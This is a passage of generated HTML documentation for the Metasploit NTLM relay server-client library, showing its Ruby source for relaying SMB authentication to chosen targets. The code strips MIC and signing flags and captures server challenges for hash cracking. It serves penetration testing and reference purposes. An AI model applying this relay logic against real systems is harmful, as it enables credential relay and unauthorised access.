<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_signing_required'>signing_required</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_security_mode'>security_mode</span><span class='period'>.</span><span class='id identifier rubyid_signing_required'>signing_required</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span> <span class='op'>&amp;&amp;</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="do_tree_connect_smb2-instance_method">
#<strong>do_tree_connect_smb2</strong>(request, session) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 44</span>
<span class='kw'>def</span> <span class='id identifier rubyid_do_tree_connect_smb2'>do_tree_connect_smb2</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Received request for </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='comment'># Attempt to select the next target to relay to
</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_next'>next</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='comment'># If there&#39;s no more targets to relay to, just tree connect to the currently running server instead
</span> <span class='kw'>if</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Identity: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> - All targets relayed to</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_prepare_relay'>prepare_relay</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>SMB2</span><span class='op'>::</span><span class='const'>Packet</span><span class='op'>::</span><span class='const'>TreeConnectResponse</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="#FORCE_RETRY_SESSION_SETUP-constant" title="Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient::FORCE_RETRY_SESSION_SETUP (constant)">FORCE_RETRY_SESSION_SETUP</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="handle_smb1-instance_method">
#<strong>handle_smb1</strong>(raw_request, header) &#x21d2; <tt>RubySMB::GenericPacket</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Handle an SMB version 1 message.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>raw_request</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The bytes of the entire SMB request.</p>
</div>
</li>
<li>
<span class='name'>header</span>
<span class='type'>(<tt>RubySMB::SMB1::SMBHeader</tt>)</span>
&mdash;
<div class='inline'>
<p>The request header.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>RubySMB::GenericPacket</tt>)</span>
</li>
</ul>
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt>NotImplementedError</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
67
68
69
70
71</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_handle_smb1'>handle_smb1</span><span class='lparen'>(</span><span class='id identifier rubyid_raw_request'>raw_request</span><span class='comma'>,</span> <span class='id identifier rubyid_header'>header</span><span class='rparen'>)</span>
<span class='id identifier rubyid__port'>_port</span><span class='comma'>,</span> <span class='id identifier rubyid_ip_address'>ip_address</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>Socket</span><span class='op'>::</span><span class='id identifier rubyid_unpack_sockaddr_in'>unpack_sockaddr_in</span><span class='lparen'>(</span><span class='id identifier rubyid_getpeername'>getpeername</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Cannot relay request from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ip_address'>ip_address</span><span class='embexpr_end'>}</span><span class='tstring_content'>. The SMB1 </span><span class='embexpr_beg'>#{</span><span class='op'>::</span><span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>SMB1</span><span class='op'>::</span><span class='const'>Commands</span><span class='period'>.</span><span class='id identifier rubyid_name'>name</span><span class='lparen'>(</span><span class='id identifier rubyid_header'>header</span><span class='period'>.</span><span class='id identifier rubyid_command'>command</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'> command is not supported - https://github.com/rapid7/metasploit-framework/issues/16261</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>NotImplementedError</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="prepare_relay-instance_method">
#<strong>prepare_relay</strong>(session) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 21</span>
<span class='kw'>def</span> <span class='id identifier rubyid_prepare_relay'>prepare_relay</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Relaying to next target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span> <span class='op'>==</span> <span class='symbol'>:smb</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span> <span class='op'>==</span> <span class='id identifier rubyid_peerhost'>peerhost</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Relaying SMB to SMB on the same host will not work if the target has been patched for MS08-068</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relayed_connection'>relayed_connection</span> <span class='op'>=</span> <span class='id identifier rubyid_create_relay_client'>create_relay_client</span><span class='lparen'>(</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='ivar'>@relay_timeout</span>
<span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_on_relay_end'>on_relay_end</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='label'>identity:</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='label'>is_success:</span> <span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_mode</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_mode</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relayed_connection</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_state'>state</span> <span class='op'>=</span> <span class='symbol'>:in_progress</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="process_gss_spnego_init-instance_method">
#<strong>process_gss_spnego_init</strong>(incoming_security_buffer) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
152
153
154
155
156
157
158
159
160
161</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 152</span>
<span class='kw'>def</span> <span class='id identifier rubyid_process_gss_spnego_init'>process_gss_spnego_init</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_gss_init'>gss_init</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Gss.html" title="Rex::Proto::Gss (module)">Gss</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Gss/SpnegoNegTokenInit.html" title="Rex::Proto::Gss::SpnegoNegTokenInit (class)">SpnegoNegTokenInit</a></span></span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span> <span class='op'>=</span> <span class='id identifier rubyid_gss_init'>gss_init</span><span class='period'>.</span><span class='id identifier rubyid_mech_token'>mech_token</span>
<span class='id identifier rubyid_validate_ntlm_blob!'>validate_ntlm_blob!</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span>
<span class='kw'>rescue</span> <span class='const'>RASN1</span><span class='op'>::</span><span class='const'>ASN1Error</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to parse NTLMSSP Type1 message from GSS: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="process_gss_spnego_targ-instance_method">
#<strong>process_gss_spnego_targ</strong>(incoming_security_buffer) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
163
164
165
166
167
168
169
170
171
172</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 163</span>
<span class='kw'>def</span> <span class='id identifier rubyid_process_gss_spnego_targ'>process_gss_spnego_targ</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_gss_targ'>gss_targ</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Gss.html" title="Rex::Proto::Gss (module)">Gss</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex/Proto/Gss/SpnegoNegTokenTarg.html" title="Rex::Proto::Gss::SpnegoNegTokenTarg (class)">SpnegoNegTokenTarg</a></span></span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span> <span class='op'>=</span> <span class='id identifier rubyid_gss_targ'>gss_targ</span><span class='period'>.</span><span class='id identifier rubyid_response_token'>response_token</span>
<span class='id identifier rubyid_validate_ntlm_blob!'>validate_ntlm_blob!</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_blob'>ntlm_blob</span>
<span class='kw'>rescue</span> <span class='const'>RASN1</span><span class='op'>::</span><span class='const'>ASN1Error</span><span class='comma'>,</span> <span class='const'>ArgumentError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to parse NTLMSSP Type3 message from GSS: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="relay_ntlmssp-instance_method">
#<strong>relay_ntlmssp</strong>(session, incoming_security_buffer = nil) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 174</span>
<span class='kw'>def</span> <span class='id identifier rubyid_relay_ntlmssp'>relay_ntlmssp</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='comma'>,</span> <span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='comment'># TODO: Add support for a default NTLM provider in ruby_smb
</span> <span class='kw'>begin</span>
<span class='id identifier rubyid_buf'>buf</span> <span class='op'>=</span> <span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_b'>b</span>
<span class='kw'>if</span> <span class='id identifier rubyid_valid_ntlm_blob?'>valid_ntlm_blob?</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_message'>ntlm_message</span> <span class='op'>=</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:ntlm_wrapper</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='symbol'>:none</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_gss_api'>gss_api</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>ASN1</span><span class='period'>.</span><span class='id identifier rubyid_decode'>decode</span><span class='lparen'>(</span><span class='id identifier rubyid_buf'>buf</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag'>tag</span> <span class='op'>==</span> <span class='int'>0</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag_class'>tag_class</span> <span class='op'>==</span> <span class='symbol'>:APPLICATION</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_process_gss_spnego_init'>process_gss_spnego_init</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_message'>ntlm_message</span> <span class='op'>=</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag'>tag</span> <span class='op'>==</span> <span class='int'>1</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_gss_api'>gss_api</span><span class='op'>&amp;.</span><span class='id identifier rubyid_tag_class'>tag_class</span> <span class='op'>==</span> <span class='symbol'>:CONTEXT_SPECIFIC</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_process_gss_spnego_targ'>process_gss_spnego_targ</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ntlm_message'>ntlm_message</span> <span class='op'>=</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_parse'>parse</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:ntlm_wrapper</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='symbol'>:gss_spnego</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>ASN1</span><span class='op'>::</span><span class='const'>ASN1Error</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to parse incoming NTLM message: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span>
<span class='kw'>end</span>
<span class='comment'># NTLM negotiation request
</span> <span class='comment'># Choose the next machine to relay to, and send the incoming security buffer to the relay target
</span> <span class='kw'>if</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_relayed_connection'>relayed_connection</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relayed_connection</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_info'>info</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Relaying NTLM type 1 message to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>(Always Sign: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_has_flag?'>has_flag?</span><span class='lparen'>(</span><span class='symbol'>:ALWAYS_SIGN</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>, </span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Sign: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_has_flag?'>has_flag?</span><span class='lparen'>(</span><span class='symbol'>:SIGN</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>, Seal: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_has_flag?'>has_flag?</span><span class='lparen'>(</span><span class='symbol'>:SEAL</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span>
<span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_and_sign_key_exch_flags'>drop_mic_and_sign_key_exch_flags</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic_and_flags'>do_drop_mic_and_flags</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_drop_mic_only'>drop_mic_only</span>
<span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_do_drop_mic'>do_drop_mic</span><span class='lparen'>(</span><span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>=</span> <span class='id identifier rubyid_relayed_connection'>relayed_connection</span><span class='period'>.</span><span class='id identifier rubyid_relay_ntlmssp_type1'>relay_ntlmssp_type1</span><span class='lparen'>(</span><span class='id identifier rubyid_incoming_security_buffer'>incoming_security_buffer</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='op'>&amp;.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span>
<span class='comment'># Store the incoming negotiation message, i.e. ntlm_type1
</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:incoming_negotiate_message</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span>
<span class='comment'># Store the relay target&#39;s server challenge, as it is used later when creating the JTR hash
</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target_server_challenge</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span>
<span class='id identifier rubyid_relay_result'>relay_result</span>
<span class='comment'># NTLM challenge, which should never be received from a calling client
</span> <span class='kw'>elsif</span> <span class='id identifier rubyid_ntlm_message'>ntlm_message</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='op'>::</span><span class='const'>Type2</span><span class='rparen'>)</span>
